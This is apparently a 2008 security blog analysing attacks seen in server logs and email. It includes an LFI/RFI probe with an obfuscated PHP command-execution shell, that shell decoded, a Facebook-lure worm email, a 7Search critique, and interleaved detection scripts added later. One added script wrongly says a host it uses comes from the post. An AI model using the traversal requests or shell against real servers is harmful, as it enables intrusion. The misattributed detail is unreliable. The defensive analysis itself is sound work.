2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
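
As an added example (not from the original post), here is detection logic a defender could run over log lines like the ones above. It parses the W3C extended format shown (the same field order as this server's log, with spaces inside a field written as '+') and flags the three indicators this probe combines: a URL in a query parameter (RFI), dot-dot traversal to /proc/self/environ (LFI), and a PHP open tag in the User-Agent. The sample lines it runs on are constructed to mirror the entries above, with the injected code shortened to a harmless stub and documentation addresses in place of the real ones.

```python
"""Detection logic for the RFI / LFI probe pattern in the IIS log above.

Added example, not from the original post.  The log is W3C extended format
with the fields in this order: date time cs-method cs-uri-stem cs-uri-query
s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status
sc-substatus sc-win32-status.  Spaces inside a field are written as '+', so a
line splits cleanly on whitespace.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

FIELDS = ("date", "time", "method", "uri_stem", "uri_query", "port",
          "username", "client_ip", "user_agent", "referer", "host",
          "status", "substatus", "win32_status")

# Constructed sample lines shaped like the post's entries: a remote-include
# probe, the traversal probe with PHP in the User-Agent, and a benign hit.
# Addresses and hosts are documentation values; the PHP is a harmless stub.
SAMPLE_LOG = """\
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://example.invalid/.sys/i??? 80 - 198.51.100.7 Mozilla/4.0+(compatible) - www.example.invalid 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../proc/self/environ 80 - 198.51.100.7 <?+echo+'probe';+?> - www.example.invalid 200 0 0
2008-09-10 06:41:10 GET /index.php page=about 80 - 203.0.113.9 Mozilla/5.0+(X11;+Linux) - www.example.invalid 200 0 0
"""

# A parameter whose value is a URL: remote file inclusion attempt.  Tune this
# for applications with legitimate URL parameters (redirects, callbacks).
RFI_RE = re.compile(r"=\s*(?:https?|ftp)://", re.I)
# Dot-dot traversal in either separator style.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# The local file this probe aims at; it carries the request's own environment,
# HTTP_USER_AGENT included, which is why the UA check below matters.
PROC_ENVIRON_RE = re.compile(r"/proc/self/environ", re.I)
# PHP open tag in the (decoded) User-Agent: the other half of the chain.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|\s)", re.I)


@dataclass
class Finding:
    client_ip: str
    uri_stem: str
    status: int
    indicators: list

    @property
    def complete_chain(self) -> bool:
        """True when traversal to /proc/self/environ meets code in the UA."""
        return ("proc_environ" in self.indicators
                and "php_in_user_agent" in self.indicators)


def parse_line(line: str):
    """Split one W3C log line into a field dict, or None if malformed."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def classify(entry: dict) -> list:
    """Return the indicator names a parsed request triggers, in fixed order."""
    query = unquote_plus(entry["uri_query"])
    agent = unquote_plus(entry["user_agent"])
    hits = []
    if RFI_RE.search(query):
        hits.append("rfi")
    if TRAVERSAL_RE.search(query):
        hits.append("traversal")
    if PROC_ENVIRON_RE.search(query):
        hits.append("proc_environ")
    if PHP_TAG_RE.search(agent):
        hits.append("php_in_user_agent")
    return hits


def scan(log_text: str) -> list:
    """Run the checks over a whole log; one Finding per suspicious line."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):   # skip W3C directives
            continue
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append(Finding(entry["client_ip"], entry["uri_stem"],
                                    int(entry["status"]), hits))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        tag = "  <-- full environ-injection chain" if f.complete_chain else ""
        print(f"{f.client_ip} {f.uri_stem} status={f.status} "
              f"{','.join(f.indicators)}{tag}")
```

A 200 on a traversal line, as in the log above, is worth a second look: either the target script exists and took the parameter, or a custom error page is answering with the wrong status.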


The RFI (Remote File Inclusion) comes courtesy of;

http://bregler-gmbh.de/.sys/i???


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://bregler-gmbh.de/.sys/i???
Server IP: 212.227.240.102 [ regiocd.de ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 10 September 2008
Time: 08:49:35:49
*****************************************************************

#####################################################################
# +------------------+ #
# | ___ | Crank #
# | _ (,~ | _ | we are crank. this is crank. #
# | (____/ |____) | #
# | ||||| ||||| | if your skilld in perl,php,c,c++ #
# | ||||| ||||| | Contact: http://cr4nk.ws #
# | |||||\ /||||| | E-Mail : cr4nk@land.ru #
# | |||'//\/\\`||| | irc.unixunited.net /join #cr4nk #
# | |' m' /\ `m `| | #
# | /||\ | Greets to our Friends #
# \_ _/ tng,asc,satyr #
# `------------' #
#####################################################################


$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit(); ?>


Most likely a hacked server, but they've been notified.

The code that they've tried directly injecting is as follows;


<?
    $x0e="\145x\x65\x63";
    $x0f="\x66eo\146";
    $x10="\x66\x72ea\x64";
    $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";
    $x12="i\163\x5f\162\x65s\157ur\x63\x65";
    $x13="\152\157\x69\156";
    $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";
    $x15="ob\137\x65\156d\137\x63lea\156";
    $x16="\x6fb_st\x61\x72\164";
    $x17="\x70\141\163s\164\x68\162\165";
    $x18="\x70\143\154ose";
    $x19="p\157\160e\x6e";
    $x1a="\163h\145\154l\137\x65\170e\143";
    $x1b="\x73\x79s\x74e\x6d";
    function x0b($x0b){
        global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;
        $x0c='';
        if(!empty($x0b)){
            if($x11('exec')){
                @$x0e($x0b,$x0c);
                $x0c=$x13("\n",$x0c);
            }elseif($x11('shell_exec')){
                $x0c=@$x1a($x0b);
            }elseif($x11('system')){
                @$x16();@$x1b($x0b);$x0c=@$x14();@$x15();
            }elseif($x11('passthru')){
                @$x16();@$x17($x0b);$x0c=@$x14();@$x15();
            }elseif(@$x12($x0d=@$x19($x0b,"\x72"))){
                $x0c="";
                while(!@$x0f($x0d)){
                    $x0c.=@$x10($x0d,1024);
                }
                @$x18($x0d);
            }
        }
        return $x0c;
    }
    echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");
?>

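As an added example, not part of the original post: a small Python scanner over IIS W3C log lines laid out like the one at the top of this post. It flags directory traversal and /proc/self/environ in the query string, a remote URL used as a parameter value (the RFI case), and a PHP open tag carried in the User-Agent or Referer, and marks the environ + PHP-in-header pair as the LFI-to-RCE combination. The three sample lines are constructed (the first shortens the real payload, the second uses the placeholder host attacker.example), and the 14-field order is assumed from the log line above.

```python
import re
from urllib.parse import unquote_plus

# Field order of the IIS W3C line at the top of the post (assumed from that line)
FIELDS = ("date", "time", "method", "stem", "query", "port", "user", "client_ip",
          "user_agent", "referer", "host", "status", "substatus", "win32")

# Constructed sample lines: the first mirrors the real request (payload shortened),
# the second is a remote include with a placeholder host, the third is benign.
SAMPLE_LOG = r"""
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+echo+x0b("id");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:41:02 GET /misc/server_request.php CONFIG[gameroot]=http://attacker.example/shell.txt? 80 - 88.84.157.127 Mozilla/4.0 - mysteryfcm.co.uk 200 0 0
2008-09-10 06:42:10 GET /index.php page=about 80 - 192.0.2.10 Mozilla/5.0+(Windows) http://example.com/ mysteryfcm.co.uk 200 0 0
"""

REMOTE_INCLUDE = re.compile(r"=(?:https?|ftps?)://", re.I)   # a parameter value that is a URL
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.I)         # "<? ", "<?php", "<?="

def parse_line(line):
    """Split one log line into a dict, or return None if it lacks the 14 fields."""
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    # IIS writes spaces as '+' and keeps %xx encoding; undo both before matching
    rec["query"] = unquote_plus(rec["query"])
    rec["user_agent"] = unquote_plus(rec["user_agent"])
    rec["referer"] = unquote_plus(rec["referer"])
    return rec

def classify(rec):
    """Return the list of indicators present in one parsed request."""
    tags = []
    q = rec["query"].lower()
    if "../" in q or "..\\" in q:
        tags.append("traversal")
    if "/proc/self/environ" in q:
        tags.append("proc-environ")
    if REMOTE_INCLUDE.search(rec["query"]):
        tags.append("remote-include")
    if PHP_OPEN_TAG.search(rec["user_agent"]) or PHP_OPEN_TAG.search(rec["referer"]):
        tags.append("php-in-header")
    # environ reached through the include plus PHP in a request header is the
    # combination that turns a local file include into code execution
    if "proc-environ" in tags and "php-in-header" in tags:
        tags.append("lfi-rce")
    return tags

def scan(text):
    """Return (client_ip, uri_stem, tags) for every line that trips an indicator."""
    hits = []
    for line in text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec["client_ip"], rec["stem"], tags))
    return hits

if __name__ == "__main__":
    for ip, stem, tags in scan(SAMPLE_LOG):
        print(ip, stem, ", ".join(tags))
```

Run it over a real log and the first thing to pivot on is the client IP of any "lfi-rce" hit; the same source usually shows up a few seconds earlier probing with a plain remote URL, as the second sample line does.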

/edit

I sent this to the ladies and gents at the ISC (Internet Storm Center), and got a reply from Bojan Zdrnj (cheers Bojan :o));


Thanks for sending this. They basically obfuscate characters by using their hex or octal values. When you see numbers like this \111 it's their octal value and when you see numbers like \x1f it's the hex value.

You can clean this up by using perl easily. I just saved the original PHP (the one you sent) into sample.php and used the following line (two perl calls inside, this could be done in a single perl program as well):

$ perl -pe 's/\\([0-7]{1,3})/chr(oct($1))/ge' < sample.php | perl -pe 's/\\x([0-9a-fA-F]{1,2})/chr(hex($1))/ge'


Once you execute this you'll get readable code:

<?
    $x0e="exec";
    $x0f="feof";
    $x10="fread";
    $x11="function_exists";
    $x12="is_resource";
    $x13="join";
    $x14="ob_get_contents";
    $x15="ob_end_clean";
    $x16="ob_start";
    $x17="passthru";
    $x18="pclose";
    $x19="popen";
    $x1a="shell_exec";
    $x1b="system";
    function x0b($x0b){
        global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;
        $x0c='';
        if(!empty($x0b)){
            // try each command-execution primitive in turn until one is enabled
            if($x11('exec')){
                @$x0e($x0b,$x0c);
                $x0c=$x13("\n",$x0c);
            }elseif($x11('shell_exec')){
                $x0c=@$x1a($x0b);
            }elseif($x11('system')){
                @$x16();@$x1b($x0b);$x0c=@$x14();@$x15();
            }elseif($x11('passthru')){
                @$x16();@$x17($x0b);$x0c=@$x14();@$x15();
            }elseif(@$x12($x0d=@$x19($x0b,"r"))){
                // last resort: popen() the command and read its output
                $x0c="";
                while(!@$x0f($x0d)){
                    $x0c.=@$x10($x0d,1024);
                }
                @$x18($x0d);
            }
        }
        return $x0c;
    }
    echo x0b("echo cr4nk_rocks");
?>


This results in them trying to execute the command "echo cr4nk rocks" by using the PHP functions exec, shell_exec, system and passthru. At the end they probably check the result so if they get the string "cr4nk rocks" back, they know that the RFI attack worked.

Cheers,

Bojan
ISC Handler
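
An added example, not Bojan's or the post's code: a Python version of the same decoding that handles the escapes PHP honours in double-quoted strings, one to three octal digits and one to two hex digits including a-f (a \d\d class misses escapes such as \x5f and \x6e), and then substitutes the decoded names back into the $xNN(...) calls so the shell reads as plain PHP. The SAMPLE string is a trimmed copy of the injected snippet above; the helper names are mine.

```python
import re

# The escapes PHP honours inside double-quoted strings: \ooo with 1-3 octal
# digits and \xhh with 1-2 hex digits. A doubled backslash is matched first and
# left alone so that "\\145" is not misread as an octal escape.
_ESC = re.compile(r"\\\\|\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})")

def decode_php_escapes(src):
    """Replace every \\ooo and \\xhh escape in src with the character it encodes."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8))
        if m.group(2) is not None:
            return chr(int(m.group(2), 16))
        return m.group(0)            # the doubled-backslash case: leave as written
    return _ESC.sub(repl, src)

# $xNN="..."; assignments whose decoded value looks like a bare function name
_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"\\]*)"\s*;')
_CALL = re.compile(r"\$(\w+)\(")

def resolve_aliases(php_src):
    """Decode the escapes, then rewrite $var(...) calls to the function name
    that $var was assigned, so the shell reads as ordinary PHP.
    Returns (rewritten source, {variable: function name})."""
    src = decode_php_escapes(php_src)
    names = {}
    for var, value in _ASSIGN.findall(src):
        if re.fullmatch(r"[A-Za-z_]\w*", value):
            names[var] = value
    rewritten = _CALL.sub(lambda m: names.get(m.group(1), "$" + m.group(1)) + "(", src)
    return rewritten, names

# Constructed sample: a trimmed copy of the injected shell above (same strings).
SAMPLE = r'''<? $x0e="\145x\x65\x63"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";
$x1a="\163h\145\154l\137\x65\170e\143";
function x0b($x0b){ global $x0e,$x11,$x1a; $x0c='';
if($x11('exec')){@$x0e($x0b,$x0c);}elseif($x11('shell_exec')){$x0c=@$x1a($x0b);}
return $x0c;}
echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s"); ?>'''

if __name__ == "__main__":
    out, names = resolve_aliases(SAMPLE)
    print(names)
    print(out)
```

The alias map is the useful artefact for triage: if it contains exec, shell_exec, system, passthru or popen, you are looking at a command shell regardless of how the rest of the file is dressed up.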

Tuesday, 9 September 2008

An old friend added you as a friend on facebook

I received this one a few minutes ago, and am not normally excited at receiving "added you as a friend" stuff (I receive a ton of it from various social network sites, such as those I referenced previously), but this one caught my attention due to its size - 290K, rather large for the e-mails I tend to receive.

Anywho, I decided to check it out, lo and behold (you know what's coming), we gots ourselves both a worm and a little psychology going on "they'll think they gots friends and install our worm LOLZ!" - alas nope, I'm not that gullible.

The e-mail reads:


Facebook is a social utility that connects you with the people around you.

Facebook notifier

One of your old classmates added you as a friend on Facebook. We need to confirm that you know her in order for you to be friends on Facebook.

To see her picture please check your attachment.

Thanks,
The Facebook Team
Facebook © 2008


The attachment, picture.zip, contains (surprise surprise) a lovely little executable (picture.exe), and whilst my AV detected it as a worm (Worm/Agent.FT), I decided to upload it to VT anyway;

http://www.virustotal.com/analisis/792924e8c83e3f1230a0f8b44a11cddf

30/36 is unusually great - normally detection this high takes several weeks, not a couple of days (it was apparently uploaded by someone else a couple of days prior to my receiving it).

The entire e-mail + headers is as follows;


Exported by: Outlook Export v0.1.2

From: confirm-r16xa@facebookmail.com
E-mail:confirm-r16xa@facebookmail.com [ 204.15.20.125 - mx01.facebookmail.com ]
Date: 10/09/2008 09:15:07
Subject: An old friend added you as a friend on facebook
**************************************************************************
Links
**************************************************************************

Link: hxxp://www.facebook.com/
Domain: www.facebook.com
IP: 69.63.178.16 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://www.facebook.com/reset.php
Domain: www.facebook.com
IP: 69.63.178.16 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://static.ak.fbcdn.net/images/welcome/welcome_3.gif
Domain: static.ak.fbcdn.net
IP: 62.41.85.97 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
<http://www.facebook.com/>
Email: Password:Remember me
Forgot Password? <http://www.facebook.com/reset.php>
<http://static.ak.fbcdn.net/images/welcome/welcome_3.gif>
Facebook is a social utility that connects you with the people around you.

Facebook notifier




One of your old classmates added you as a friend on Facebook. We need to confirm that you know her in order for you to be friends on Facebook.

To see her picture please check your attachment.


Thanks,

The Facebook Team

Facebook © 2008


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2><<A HREF="http://www.facebook.com/">http://www.facebook.com/</A>><BR>
Email: Password:Remember me<BR>
Forgot Password? <<A HREF="http://www.facebook.com/reset.php">http://www.facebook.com/reset.php</A>><BR>
 <<A HREF="http://static.ak.fbcdn.net/images/welcome/welcome_3.gif">http://static.ak.fbcdn.net/images/welcome/welcome_3.gif</A>><BR>
Facebook is a social utility that connects you with the people around you.<BR>
<BR>
Facebook notifier<BR>
<BR>
<BR>
<BR>
<BR>
One of your old classmates added you as a friend on Facebook. We need to confirm that you know her in order for you to be friends on Facebook.<BR>
<BR>
To see her picture please check your attachment.<BR>
<BR>
<BR>
Thanks,<BR>
<BR>
The Facebook Team<BR>
<BR>
Facebook © 2008<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <confirm-r16xa@facebookmail.com>
Delivered-To: services@[RMV]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-123.livemail.co.uk (Postfix) with SMTP id 0B8545DE8AE
for <services@[RMV]>; Wed, 10 Sep 2008 09:18:41 +0100 (BST)
Received: from facebookmail.com (mail.squires.co.za [196.37.170.133])
by smtp-in-123.livemail.co.uk (Postfix) with ESMTP id D206F5DE96E
for <services@[RMV]>; Wed, 10 Sep 2008 09:17:13 +0100 (BST)
From: confirm-r16xa@facebookmail.com
To: services@[RMV]
Subject: An old friend added you as a friend on facebook
Date: Wed, 10 Sep 2008 10:15:07 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0011_BC1902DD.257BF8A1"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20080910081713.D206F5DE96E@smtp-in-123.livemail.co.uk>
X-Original-To: services@[RMV]


Needless to say, if you receive this - delete it!

hpHOSTS - UPDATED September 10th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,747 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

  1. Latest Updated: 10/09/2008 06:19

  2. Last Verified: 10/09/2008 05:30

Download hpHosts now!
http://hosts-file.net/?s=Download

The good guys are the bad guys? err ..... huh?

7Search.com just gave me a laugh with their article on how to remove the "bad" hosts file as they put it - you know the one, it's the same hosts file offered from myself, SpyBot Search & Destroy, and of course, MVPS.

How to delete the "bad" HOSTS file created by SpyBot, MVPS.org, hpHosts, etc.
http://faq.7search.com/index.php?action=artikel&cat=11&id=276&artlang=en

Why is this so funny? Well actually it's both funny and confusing. Confusing because 7Search also own the very, very well known 7FaSSt and BrowserAccelerator (Ref: http://hosts-file.net/?s=browseraccelerator.com). This has long been known as spyware, and indeed, is still hosted on an IP that's filled with other malicious domains.

7Search recently also sued McAfee over their classing 7Search as malware. Why only McAfee? Who knows - their demanding McAfee remove any reference to their peddling malware was a nice touch though (what is it with these people wanting to remove references to nasty stuff they did? Irrespective of how old, the user has a right to know).

7Search however, also own 7searcher.com, internetsupervision.com, validatedsites.com, validatedsite.com and trustgauge.com. These sites claim to provide you with information on how "trustworthy" a site is. Coming from a malware distributor, I just had to take a look. Under "Validation Process", they claim;
"When you register with ValidatedSite we immediately go to work validating your business and your website.

The address posted by the site is a genuine postal address where certified mail was sent, received and returned by the site owners.

The personal phone numbers of a website's owners and managers have been called to confirm ownership of a website.

Additional information this organization provides can be made available by clicking on the ValidatedSite™ seal.

Verification that the privacy policy of the site clearly states the safeguards and protection procedures in place for the e-mail addresses, credit card and personal information that visitors release.

The published phone numbers of the website have been called and verified as belonging to the web site."

Great! So, err, how much does this "process" cost? Well, apparently quite a bit;



Okay, for a laugh, let's see how much it would cost me for hpHosts shall we? - that's quite the price there. So what would my visitors see if they wanted to see how trustworthy I was, using their service? See for yourself - not very convincing, unless you want to be convinced to install their spyware. The ads at the top, btw, go through ia1.7search.com. Nice scam they've got there - you pay them all that money and they still try and make more out of you!

They also allow you to "preview" what you'd apparently see about a site, when using their toolbar. The results are even more hilarious than before;



So what does it say about VitalSecurity then? A site I most definitely DO trust. Not a lot apparently, PG's "trust" rating is only 2 (prolly because he's not paid them to say otherwise). In fact, it seems every damn site I trust has an extremely "low" trust rating.

So should you trust BrowserAccelerator, ValidatedSite, InternetSupervision, TrustGauge, 7Search - whatever they want to call themselves? Personally, I'm going for a resounding NO! But I'm silly like that, I don't trust anyone that offers malware. I'll let you make your own mind up.

References

http://certifiedbug.com/blog/2008/08/30/7search-files-complaint-over-siteadvisors-spyware-tag/

http://www.theregister.co.uk/2008/08/28/7search_sues_mcafee/

http://www.emsisoft.com/en/malware/?Adware.ToolBar.7Search.a

Monday, 8 September 2008

New vURL Online updates

I've made a few more modifications to vURL Online. The main updates include the options to allow both spoofing the referer, and spoofing the country of origin.

The main reason for the latter is that a lot of malicious websites redirect you based on geo-tracking (essentially, the country you are from). By selecting a different server, you can change where you appear to come from. Thus far I've only got 2 UK servers, and thanks to Tom (TeMerc Internet Countermeasures), a US server.

If you'd like to set up a mirror for me on a server in a different country (I could do with as many different countries as possible), please feel free to use the following PHP script I've written (the URL and referer parameters are required, so if you create your own, please allow for those), then send me the URL to where you've got the script (and of course, let me know which country it is in).


<?php
        // The 'url' and 'ref' parameters are required. Read them from $_GET,
        // which PHP has already URL-decoded once: the earlier urldecode() +
        // parse_str() pair decoded twice, so a target URL containing %26 was
        // cut short at the first '&'.
        $urlStr = isset($_GET['url']) ? $_GET['url'] : '';
        $refStr = isset($_GET['ref']) ? $_GET['ref'] : '';
        // Validate the scheme rather than HTML-escaping: htmlspecialchars()
        // turns '&' into '&amp;' and corrupts the URL, and does nothing to stop
        // file:// or other schemes cURL would happily fetch on the mirror host.
        if (!preg_match('#^https?://#i', $urlStr)) {
                header('HTTP/1.1 400 Bad Request');
                exit('url must be an http:// or https:// URL');
        }
        // User agent to pass (vURL sends the one the user selected)
        $uaStr = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';

        // Get the contents: headers + body, following redirects
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $urlStr);
        curl_setopt($curl, CURLOPT_VERBOSE, 1);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 1);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_MAXREDIRS, 10);
        curl_setopt($curl, CURLOPT_REFERER, $refStr);   // was $refURL, which was never set
        curl_setopt($curl, CURLOPT_USERAGENT, $uaStr);
        $return = curl_exec($curl);
        curl_close($curl);
        // Hand the fetched page back as plain text, so the mirror never renders
        // a malicious page's HTML to a browser that hits it directly
        header('Content-Type: text/plain; charset=UTF-8');
        print $return;
?>


Visit vURL Online at: vurl.mysteryfcm.co.uk

Announcement:
http://forum.hosts-file.net/viewtopic.php?f=42&t=716

SQL Exploitified!

I've been seeing these for some time now (indeed, I've been seeing attempts at exploiting the hpHosts server since at least May), and figured I'd collate a list of those known to have been around, both old and new.

See the following for the results of those that were live/dead as of a few minutes ago (note that there have been thousands of these domains since the attacks against everyone began; the list doesn't include them all, as not all of them have been documented (or if they were, I couldn't locate them));

http://hosts-file.net/misc/SQL_Injection_Attacks.html

Some of the domains were found courtesy of the fantastic list at;

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

I had planned to do a write-up on how the exploit was attempted, but Michael (Bloombit) has done a much more detailed job than I had planned, so I'll leave that to him.
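
As an added example (not from this post or from the Bloombit write-up), the decoder a practitioner wants for this family: pull the hex literal out of the CAST(0x... AS VARCHAR(n)) wrapper that the "ASCII-encoded binary string" attacks use and turn it back into the statement, handling both VARCHAR (single-byte) and NVARCHAR (UTF-16LE) casts. The sample payloads are constructed here; the inner statement is a placeholder UPDATE with invented table and column names, and only the 19ssl.net script URL comes from the post.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# CAST(0x<hex> AS [N]VARCHAR(n)) / [N]CHAR(n): the wrapper the injected statement
# travels in, so that the request carries no quotes the application might escape.
HEX_CAST = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR|N?CHAR)\s*\(\s*\d+\s*\)\s*\)", re.I)
SQL_WORDS = re.compile(r"\b(DECLARE|EXEC|CAST|UPDATE|SET|CURSOR)\b", re.I)

def decode_hex_literal(hexstr, wide):
    """Turn the hex literal back into text; NVARCHAR holds UTF-16LE, VARCHAR single bytes."""
    if len(hexstr) % 2:
        return None                       # odd length: not a valid literal
    raw = bytes.fromhex(hexstr)
    return raw.decode("utf-16-le" if wide else "latin-1", errors="replace")

def extract_injected_sql(query_string):
    """Decode every hex CAST found in a (URL-encoded) query string."""
    decoded = unquote_plus(query_string)
    found = []
    for m in HEX_CAST.finditer(decoded):
        text = decode_hex_literal(m.group(1), m.group(2).upper().startswith("N"))
        if text is not None:
            found.append(text)
    return found

def is_mass_sqli(query_string):
    """Flag requests that both carry a hex CAST and read like a T-SQL batch."""
    decoded = unquote_plus(query_string)
    return HEX_CAST.search(decoded) is not None and len(SQL_WORDS.findall(decoded)) >= 2

# Constructed samples: the inner statement is a placeholder UPDATE appending a
# script tag that points at the redirector seen in this post (names invented).
INNER = "UPDATE pages SET body = body + '<script src=http://www.19ssl.net/script.js></script>'"
SAMPLE_QUERY = "id=1;" + quote_plus(
    "DECLARE @S VARCHAR(4000);SET @S=CAST(0x" + INNER.encode("latin-1").hex()
    + " AS VARCHAR(4000));EXEC(@S);--")
SAMPLE_NVARCHAR = "id=1;" + quote_plus(
    "DECLARE @S NVARCHAR(4000);SET @S=CAST(0x" + INNER.encode("utf-16-le").hex()
    + " AS NVARCHAR(4000));EXEC(@S);--")

if __name__ == "__main__":
    for q in (SAMPLE_QUERY, SAMPLE_NVARCHAR, "id=1&page=2"):
        print(is_mass_sqli(q), extract_injected_sql(q))
```

The two-keyword threshold in is_mass_sqli() keeps a lone CAST in a legitimate parameter from firing; the hex literal alone is the part worth logging, since the decoded text is what tells you which domain was being injected that day.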

